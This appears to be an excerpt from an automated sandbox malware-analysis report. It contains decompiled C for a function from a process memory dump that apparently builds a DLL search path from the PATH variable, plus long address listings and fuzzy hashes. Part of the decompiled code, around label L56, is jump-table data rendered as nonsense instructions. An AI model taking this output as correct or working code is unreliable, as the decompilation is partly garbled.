                                                                                                        0x00aeba30
                                                                                                        0x00aeba35
                                                                                                        0x00aeba35
                                                                                                        0x00aeba41
                                                                                                        0x00aeba46
                                                                                                        0x00aeba4c
                                                                                                        0x00aeba50
                                                                                                        0x00aeba54
                                                                                                        0x00aeba6a
                                                                                                        0x00aeba6e
                                                                                                        0x00aeba70
                                                                                                        0x00aeba74
                                                                                                        0x00aeba78
                                                                                                        0x00aeba7a
                                                                                                        0x00aeba7c
                                                                                                        0x00aeba8e
                                                                                                        0x00aeba90
                                                                                                        0x00aeba92
                                                                                                        0x00aebb14
                                                                                                        0x00aebb14
                                                                                                        0x00aebb16
                                                                                                        0x00aebb16
                                                                                                        0x00000000
                                                                                                        0x00aeba7c
                                                                                                        0x00aebb0a
                                                                                                        0x00aebb0d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00aebb0f

                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AEB9A5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 885266447-0
                                                                                                        • Opcode ID: 27aa1901c12f32c48cd9aea16e3fc7b17d06b663463bf1b8c7c07428b84becf4
                                                                                                        • Instruction ID: c8ea504d3588483cd097314d38329ae951f2777d79e5da119ad851924d8de157
                                                                                                        • Opcode Fuzzy Hash: 27aa1901c12f32c48cd9aea16e3fc7b17d06b663463bf1b8c7c07428b84becf4
                                                                                                        • Instruction Fuzzy Hash: 86512671618381CFCB20DF2AC48492BBBE5FB88740F24496EF58597255DB70EC44CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AF2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E00AF2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t242;
				signed int _t246;
				intOrPtr* _t247;
				signed int _t253;
				signed int _t255;
				intOrPtr _t257;
				signed int _t260;
				signed int _t267;
				signed int _t270;
				signed int _t278;
				intOrPtr _t284;
				signed int _t286;
				signed int _t288;
				signed int _t294;
				unsigned int _t297;
				signed int _t301;
				void* _t302;
				signed int _t303;
				signed int _t307;
				intOrPtr _t320;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t336;
				signed int _t337;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				void* _t344;
				intOrPtr* _t346;

				_t341 = _t343;
				_t344 = _t343 - 0x4c;
				_v8 =  *0xbbd360 ^ _t341;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t336 = 0xbbb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t297 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t284 = 0x48;
				_t317 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t329 = 0;
				_v37 = _t317;
				if(_v48 <= 0) {
					L16:
					_t45 = _t284 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t337 = 0xc0000106;
						goto L32;
					} else {
						_t336 = L00AE4620(_t297,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
						_v52 = _t336;
						__eflags = _t336;
						if(_t336 == 0) {
							_t337 = 0xc0000017;
							goto L32;
						} else {
							 *(_t336 + 0x44) =  *(_t336 + 0x44) & 0x00000000;
							_t50 = _t336 + 0x48; // 0x48
							_t331 = _t50;
							_t317 = _v32;
							 *((intOrPtr*)(_t336 + 0x3c)) = _t284;
							_t286 = 0;
							 *((short*)(_t336 + 0x30)) = _v48;
							__eflags = _t317;
							if(_t317 != 0) {
								 *(_t336 + 0x18) = _t331;
								__eflags = _t317 - 0xbb8478;
								 *_t336 = ((0 | _t317 == 0x00bb8478) - 0x00000001 & 0xfffffffb) + 7;
								E00B0F3E0(_t331,  *((intOrPtr*)(_t317 + 4)),  *_t317 & 0x0000ffff);
								_t317 = _v32;
								_t344 = _t344 + 0xc;
								_t286 = 1;
								__eflags = _a8;
								_t331 = _t331 + (( *_t317 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t278 = E00B539F2(_t331);
									_t317 = _v32;
									_t331 = _t278;
								}
							}
							_t301 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t337 = _v68;
								__eflags = 0;
								 *((short*)(_t331 - 2)) = 0;
								goto L32;
							} else {
								_t288 = _t336 + _t286 * 4;
								_v56 = _t288;
								do {
									__eflags = _t317;
									if(_t317 != 0) {
										_t242 =  *(_v60 + _t301 * 4);
										__eflags = _t242;
										if(_t242 == 0) {
											goto L30;
										} else {
											__eflags = _t242 == 5;
											if(_t242 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t288 =  *(_v60 + _t301 * 4);
										 *(_t288 + 0x18) = _t331;
										_t246 =  *(_v60 + _t301 * 4);
										__eflags = _t246 - 8;
										if(_t246 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t246 * 4 +  &M00AF2959))) {
												case 0:
													__ax =  *0xbb8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00B0F3E0(__edi,  *0xbb848c, __ax & 0x0000ffff);
														__eax =  *0xbb8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00B0F3E0(_t331, _v80, _v64);
													_t273 = _v64;
													goto L26;
												case 2:
													 *0xbb8480 & 0x0000ffff = E00B0F3E0(__edi,  *0xbb8484,  *0xbb8480 & 0x0000ffff);
													__eax =  *0xbb8480 & 0x0000ffff;
													__eax = ( *0xbb8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00B0F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00B0F3E0(_t331, _v76, _v36);
														_t273 = _v36;
													}
													L26:
													_t344 = _t344 + 0xc;
													_t331 = _t331 + (_t273 >> 1) * 2 + 2;
													__eflags = _t331;
													L27:
													_push(0x3b);
													_pop(_t275);
													 *((short*)(_t331 - 2)) = _t275;
													goto L28;
												case 6:
													__ebx =  *0xbb575c;
													__eflags = __ebx - 0xbb575c;
													if(__ebx != 0xbb575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00B0F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0xbb575c;
														} while (__ebx != 0xbb575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0xbb8478 & 0x0000ffff = E00B0F3E0(__edi,  *0xbb847c,  *0xbb8478 & 0x0000ffff);
													__eax =  *0xbb8478 & 0x0000ffff;
													__eax = ( *0xbb8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E00B539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0xbb6e58 & 0x0000ffff = E00B0F3E0(__edi,  *0xbb6e5c,  *0xbb6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0xbb6e58 & 0x0000ffff;
													__eax = ( *0xbb6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t301 = _v16;
													_t317 = _v32;
													L29:
													_t288 = _t288 + 4;
													__eflags = _t288;
													_v56 = _t288;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t301 = _t301 + 1;
									_v16 = _t301;
									__eflags = _t301 - _v48;
								} while (_t301 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t246 =  *(_v60 + _t329 * 4);
						if(_t246 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t246 * 4 +  &M00AF2935))) {
							case 0:
								__ax =  *0xbb8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t317 =  &_v64;
								_v80 = E00AF2E3E(0,  &_v64);
								_t284 = _t284 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0xbb8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xbb8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00ADEEF0(0xbb79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00ADEB70(__ecx, 0xbb79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t220 = _v72;
											__eflags = _t220;
											if(_t220 != 0) {
												L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t220);
											}
											_t221 = _v52;
											__eflags = _t221;
											if(_t221 != 0) {
												__eflags = _t337;
												if(_t337 < 0) {
													L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
													_t221 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t297 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0xbb7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00AE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00ADEB70(__ecx, 0xbb79a0);
										__eax = _v52;
										L36:
										_pop(_t330);
										_pop(_t338);
										__eflags = _v8 ^ _t341;
										_pop(_t285);
										return E00B0B640(_t221, _t285, _v8 ^ _t341, _t317, _t330, _t338);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t280 = _v56;
								if(_v56 != 0) {
									_t317 =  &_v36;
									_t282 = E00AF2E3E(_t280,  &_v36);
									_t297 = _v36;
									_v76 = _t282;
								}
								if(_t297 == 0) {
									goto L44;
								} else {
									_t284 = _t284 + 2 + _t297;
								}
								goto L14;
							case 6:
								__eax =  *0xbb5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0xbb8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0xbb8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0xbb6e58 & 0x0000ffff;
								__eax = ( *0xbb6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t329 = _t329 + 1;
								if(_t329 >= _v48) {
									goto L16;
								} else {
									_t317 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t302 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("scasd");
					 *((intOrPtr*)(_t336 + 0x28)) =  *((intOrPtr*)(_t336 + 0x28)) + _t246;
					asm("scasd");
					_t247 = _t246 + _t246;
					asm("daa");
					asm("scasd");
					 *_t336 =  *_t336 + _t302;
					asm("scasd");
					 *((intOrPtr*)(_t336 + 0x28)) =  *((intOrPtr*)(_t336 + 0x28)) + _t247;
					asm("scasd");
					 *0x1f00af26 =  *0x1f00af26 + _t247;
					_t346 = _t247;
					 *((intOrPtr*)(_t331 - 0x4ca4cb00)) =  *((intOrPtr*)(_t331 - 0x4ca4cb00)) - _t302;
					 *_t317 =  *_t317 + _t344;
					 *((intOrPtr*)(_t331 - 0x50d78000)) =  *((intOrPtr*)(_t331 - 0x50d78000)) - _t341;
					asm("daa");
					asm("scasd");
					 *_t336 =  *_t336;
					 *((intOrPtr*)(_t331 - 0x50d7b200)) =  *((intOrPtr*)(_t331 - 0x50d7b200)) - _t302;
					_a35 = _a35;
					asm("scasd");
					asm("scasd");
					 *_t346 =  *_t346 + _t317 + _t317;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0xb9ff00);
					E00B1D08C(0, _t331, _t336);
					_v44 =  *[fs:0x18];
					_t332 = 0;
					 *_a24 = 0;
					_t294 = _a12;
					__eflags = _t294;
					if(_t294 == 0) {
						_t253 = 0xc0000100;
					} else {
						_v8 = 0;
						_t339 = 0xc0000100;
						_v52 = 0xc0000100;
						_t255 = 4;
						while(1) {
							_v40 = _t255;
							__eflags = _t255;
							if(_t255 == 0) {
								break;
							}
							_t307 = _t255 * 0xc;
							_v48 = _t307;
							__eflags = _t294 -  *((intOrPtr*)(_t307 + 0xaa1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t270 = E00B0E5C0(_a8,  *((intOrPtr*)(_t307 + 0xaa1668)), _t294);
									_t346 = _t346 + 0xc;
									__eflags = _t270;
									if(__eflags == 0) {
										_t339 = E00B451BE(_t294,  *((intOrPtr*)(_v48 + 0xaa166c)), _a16, _t332, _t339, __eflags, _a20, _a24);
										_v52 = _t339;
										break;
									} else {
										_t255 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t255 = _t255 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t339;
						__eflags = _t339;
						if(_t339 < 0) {
							__eflags = _t339 - 0xc0000100;
							if(_t339 == 0xc0000100) {
								_t303 = _a4;
								__eflags = _t303;
								if(_t303 != 0) {
									_v36 = _t303;
									__eflags =  *_t303 - _t332;
									if( *_t303 == _t332) {
										_t339 = 0xc0000100;
										goto L76;
									} else {
										_t320 =  *((intOrPtr*)(_v44 + 0x30));
										_t257 =  *((intOrPtr*)(_t320 + 0x10));
										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t303;
										if( *((intOrPtr*)(_t257 + 0x48)) == _t303) {
											__eflags =  *(_t320 + 0x1c);
											if( *(_t320 + 0x1c) == 0) {
												L106:
												_t339 = E00AF2AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
												_v32 = _t339;
												__eflags = _t339 - 0xc0000100;
												if(_t339 != 0xc0000100) {
													goto L69;
												} else {
													_t332 = 1;
													_t303 = _v36;
													goto L75;
												}
											} else {
												_t260 = E00AD6600( *(_t320 + 0x1c));
												__eflags = _t260;
												if(_t260 != 0) {
													goto L106;
												} else {
													_t303 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t339 = E00AF2C50(_t303, _a8, _t294, _a16, _a20, _a24, _t332);
											L76:
											_v32 = _t339;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00ADEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t339 = _a24;
									_t267 = E00AF2AE4( &_v36, _a8, _t294, _a16, _a20, _t339);
									_v32 = _t267;
									__eflags = _t267 - 0xc0000100;
									if(_t267 == 0xc0000100) {
										_v32 = E00AF2C50(_v36, _a8, _t294, _a16, _a20, _t339, 1);
									}
									_v8 = _t332;
									E00AF2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t253 = _t339;
					}
					L70:
					return E00B1D0D1(_t253);
				}
				L108:
			}



















































                                                                                                        0x00af2584
                                                                                                        0x00af2586
                                                                                                        0x00af2590
                                                                                                        0x00af2596
                                                                                                        0x00af2597
                                                                                                        0x00af2598
                                                                                                        0x00af2599
                                                                                                        0x00af259e
                                                                                                        0x00af25a4
                                                                                                        0x00af25a9
                                                                                                        0x00af25ac
                                                                                                        0x00af25ae
                                                                                                        0x00af25b1
                                                                                                        0x00af25b2
                                                                                                        0x00af25b5
                                                                                                        0x00af25b8
                                                                                                        0x00af25bb
                                                                                                        0x00af25bc
                                                                                                        0x00af25bf
                                                                                                        0x00af25c2
                                                                                                        0x00af25c5
                                                                                                        0x00af25c6
                                                                                                        0x00af25cb
                                                                                                        0x00af25ce
                                                                                                        0x00af25d8
                                                                                                        0x00af25dd
                                                                                                        0x00af25de
                                                                                                        0x00af25e1
                                                                                                        0x00af25e3
                                                                                                        0x00af25e9
                                                                                                        0x00af26da
                                                                                                        0x00af26da
                                                                                                        0x00af26dd
                                                                                                        0x00af26e2
                                                                                                        0x00b35b56
                                                                                                        0x00000000
                                                                                                        0x00af26e8
                                                                                                        0x00af26f9
                                                                                                        0x00af26fb
                                                                                                        0x00af26fe
                                                                                                        0x00af2700
                                                                                                        0x00b35b60
                                                                                                        0x00000000
                                                                                                        0x00af2706
                                                                                                        0x00af2706
                                                                                                        0x00af270a
                                                                                                        0x00af270a
                                                                                                        0x00af270d
                                                                                                        0x00af2713
                                                                                                        0x00af2716
                                                                                                        0x00af2718
                                                                                                        0x00af271c
                                                                                                        0x00af271e
                                                                                                        0x00b35b6c
                                                                                                        0x00b35b6f
                                                                                                        0x00b35b7f
                                                                                                        0x00b35b89
                                                                                                        0x00b35b8e
                                                                                                        0x00b35b93
                                                                                                        0x00b35b96
                                                                                                        0x00b35b9c
                                                                                                        0x00b35ba0
                                                                                                        0x00b35ba3
                                                                                                        0x00b35bab
                                                                                                        0x00b35bb0
                                                                                                        0x00b35bb3
                                                                                                        0x00b35bb3
                                                                                                        0x00b35ba3
                                                                                                        0x00af2724
                                                                                                        0x00af2726
                                                                                                        0x00af2729
                                                                                                        0x00af272c
                                                                                                        0x00af279d
                                                                                                        0x00af279d
                                                                                                        0x00af27a0
                                                                                                        0x00af27a2
                                                                                                        0x00000000
                                                                                                        0x00af272e
                                                                                                        0x00af272e
                                                                                                        0x00af2731
                                                                                                        0x00af2734
                                                                                                        0x00af2734
                                                                                                        0x00af2736
                                                                                                        0x00b35bc1
                                                                                                        0x00b35bc1
                                                                                                        0x00b35bc4
                                                                                                        0x00000000
                                                                                                        0x00b35bca
                                                                                                        0x00b35bca
                                                                                                        0x00b35bcd
                                                                                                        0x00000000
                                                                                                        0x00b35bd3
                                                                                                        0x00000000
                                                                                                        0x00b35bd3
                                                                                                        0x00b35bcd
                                                                                                        0x00af273c
                                                                                                        0x00af273c
                                                                                                        0x00af2742
                                                                                                        0x00af2747
                                                                                                        0x00af274a
                                                                                                        0x00af274d
                                                                                                        0x00af2750
                                                                                                        0x00000000
                                                                                                        0x00af2756
                                                                                                        0x00af2756
                                                                                                        0x00000000
                                                                                                        0x00af2902
                                                                                                        0x00af2908
                                                                                                        0x00af290b
                                                                                                        0x00000000
                                                                                                        0x00af2911
                                                                                                        0x00af291c
                                                                                                        0x00af2921
                                                                                                        0x00000000
                                                                                                        0x00af2921
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2880
                                                                                                        0x00af2887
                                                                                                        0x00af288c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2805
                                                                                                        0x00af280a
                                                                                                        0x00af2814
                                                                                                        0x00af2816
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af281e
                                                                                                        0x00af2821
                                                                                                        0x00af2823
                                                                                                        0x00000000
                                                                                                        0x00af2829
                                                                                                        0x00af2829
                                                                                                        0x00af2831
                                                                                                        0x00af283c
                                                                                                        0x00af283e
                                                                                                        0x00000000
                                                                                                        0x00af283e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af284e
                                                                                                        0x00af2850
                                                                                                        0x00af2851
                                                                                                        0x00af2854
                                                                                                        0x00af2857
                                                                                                        0x00af285a
                                                                                                        0x00af285c
                                                                                                        0x00af285d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af275d
                                                                                                        0x00af2761
                                                                                                        0x00000000
                                                                                                        0x00af2767
                                                                                                        0x00af276e
                                                                                                        0x00af2773
                                                                                                        0x00af2773
                                                                                                        0x00af2776
                                                                                                        0x00af2778
                                                                                                        0x00af277e
                                                                                                        0x00af277e
                                                                                                        0x00af2781
                                                                                                        0x00af2781
                                                                                                        0x00af2783
                                                                                                        0x00af2784
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b35bd8
                                                                                                        0x00b35bde
                                                                                                        0x00b35be4
                                                                                                        0x00b35be6
                                                                                                        0x00b35be8
                                                                                                        0x00b35be9
                                                                                                        0x00b35bee
                                                                                                        0x00b35bf8
                                                                                                        0x00b35bff
                                                                                                        0x00b35c01
                                                                                                        0x00b35c04
                                                                                                        0x00b35c07
                                                                                                        0x00b35c0b
                                                                                                        0x00b35c0d
                                                                                                        0x00b35c0d
                                                                                                        0x00b35c15
                                                                                                        0x00b35c18
                                                                                                        0x00b35c1b
                                                                                                        0x00b35c1b
                                                                                                        0x00b35c1e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af28c3
                                                                                                        0x00af28c8
                                                                                                        0x00af28d2
                                                                                                        0x00af28d4
                                                                                                        0x00af28d8
                                                                                                        0x00af28db
                                                                                                        0x00b35c26
                                                                                                        0x00b35c28
                                                                                                        0x00b35c2d
                                                                                                        0x00b35c2d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b35c34
                                                                                                        0x00b35c36
                                                                                                        0x00b35c49
                                                                                                        0x00b35c4e
                                                                                                        0x00b35c54
                                                                                                        0x00b35c5b
                                                                                                        0x00b35c5d
                                                                                                        0x00b35c60
                                                                                                        0x00af2788
                                                                                                        0x00af2788
                                                                                                        0x00af278b
                                                                                                        0x00af278e
                                                                                                        0x00af278e
                                                                                                        0x00af278e
                                                                                                        0x00af2791
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2756
                                                                                                        0x00af2750
                                                                                                        0x00000000
                                                                                                        0x00af2794
                                                                                                        0x00af2794
                                                                                                        0x00af2795
                                                                                                        0x00af2798
                                                                                                        0x00af2798
                                                                                                        0x00000000
                                                                                                        0x00af2734
                                                                                                        0x00af272c
                                                                                                        0x00af2700
                                                                                                        0x00af25ef
                                                                                                        0x00af25ef
                                                                                                        0x00af25ef
                                                                                                        0x00af25f2
                                                                                                        0x00af25f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af25fe
                                                                                                        0x00000000
                                                                                                        0x00af28e6
                                                                                                        0x00af28ec
                                                                                                        0x00af28ef
                                                                                                        0x00af28f5
                                                                                                        0x00af28f8
                                                                                                        0x00af28f8
                                                                                                        0x00000000
                                                                                                        0x00af28f8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2866
                                                                                                        0x00af2866
                                                                                                        0x00af2876
                                                                                                        0x00af2879
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af27e0
                                                                                                        0x00af27e7
                                                                                                        0x00af27e9
                                                                                                        0x00af27eb
                                                                                                        0x00b35afd
                                                                                                        0x00000000
                                                                                                        0x00b35afd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2633
                                                                                                        0x00af2638
                                                                                                        0x00af263b
                                                                                                        0x00af263c
                                                                                                        0x00af263e
                                                                                                        0x00af2640
                                                                                                        0x00af2642
                                                                                                        0x00af2647
                                                                                                        0x00af2649
                                                                                                        0x00af264e
                                                                                                        0x00af2650
                                                                                                        0x00af2653
                                                                                                        0x00af2659
                                                                                                        0x00af26a2
                                                                                                        0x00af26a7
                                                                                                        0x00af26ac
                                                                                                        0x00af26b2
                                                                                                        0x00b35b11
                                                                                                        0x00b35b15
                                                                                                        0x00b35b17
                                                                                                        0x00000000
                                                                                                        0x00af26b8
                                                                                                        0x00af26b8
                                                                                                        0x00af26ba
                                                                                                        0x00af27a6
                                                                                                        0x00af27a6
                                                                                                        0x00af27a9
                                                                                                        0x00af27ab
                                                                                                        0x00af27b9
                                                                                                        0x00af27b9
                                                                                                        0x00af27be
                                                                                                        0x00af27c1
                                                                                                        0x00af27c3
                                                                                                        0x00af27c5
                                                                                                        0x00af27c7
                                                                                                        0x00b35c74
                                                                                                        0x00b35c79
                                                                                                        0x00b35c79
                                                                                                        0x00af27c7
                                                                                                        0x00000000
                                                                                                        0x00af26c0
                                                                                                        0x00af26c0
                                                                                                        0x00af26c3
                                                                                                        0x00af26c6
                                                                                                        0x00af26c6
                                                                                                        0x00af26c9
                                                                                                        0x00af26c9
                                                                                                        0x00000000
                                                                                                        0x00af26c9
                                                                                                        0x00af26ba
                                                                                                        0x00af265b
                                                                                                        0x00af265b
                                                                                                        0x00af265e
                                                                                                        0x00af2667
                                                                                                        0x00af266d
                                                                                                        0x00af2677
                                                                                                        0x00af267c
                                                                                                        0x00af267f
                                                                                                        0x00af2681
                                                                                                        0x00b35b49
                                                                                                        0x00b35b4e
                                                                                                        0x00af27cd
                                                                                                        0x00af27d0
                                                                                                        0x00af27d1
                                                                                                        0x00af27d2
                                                                                                        0x00af27d4
                                                                                                        0x00af27dd
                                                                                                        0x00af2687
                                                                                                        0x00af2687
                                                                                                        0x00af268a
                                                                                                        0x00af268b
                                                                                                        0x00af268e
                                                                                                        0x00af268f
                                                                                                        0x00af2691
                                                                                                        0x00af2696
                                                                                                        0x00af2698
                                                                                                        0x00af269d
                                                                                                        0x00af269f
                                                                                                        0x00000000
                                                                                                        0x00af269f
                                                                                                        0x00af2681
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2846
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2605
                                                                                                        0x00af260a
                                                                                                        0x00af260c
                                                                                                        0x00af2611
                                                                                                        0x00af2616
                                                                                                        0x00af2619
                                                                                                        0x00af2619
                                                                                                        0x00af261e
                                                                                                        0x00000000
                                                                                                        0x00af2624
                                                                                                        0x00af2627
                                                                                                        0x00af2627
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b35b1f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af2894
                                                                                                        0x00af289b
                                                                                                        0x00af289d
                                                                                                        0x00af28a1
                                                                                                        0x00b35b2b
                                                                                                        0x00b35b2e
                                                                                                        0x00b35b2e
                                                                                                        0x00af28a7
                                                                                                        0x00af28a9
                                                                                                        0x00b35b04
                                                                                                        0x00b35b09
                                                                                                        0x00b35b09
                                                                                                        0x00b35b09
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b35b35
                                                                                                        0x00b35b3c
                                                                                                        0x00af28fb
                                                                                                        0x00af28fb
                                                                                                        0x00af26cc
                                                                                                        0x00af26cc
                                                                                                        0x00af26d0
                                                                                                        0x00000000
                                                                                                        0x00af26d2
                                                                                                        0x00af26d2
                                                                                                        0x00000000
                                                                                                        0x00af26d2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00af25fe
                                                                                                        0x00af292d
                                                                                                        0x00af292f
                                                                                                        0x00af2930
                                                                                                        0x00af2935
                                                                                                        0x00af2937
                                                                                                        0x00af2938
                                                                                                        0x00af293b
                                                                                                        0x00af293c
                                                                                                        0x00af293e
                                                                                                        0x00af293f
                                                                                                        0x00af2940
                                                                                                        0x00af2942
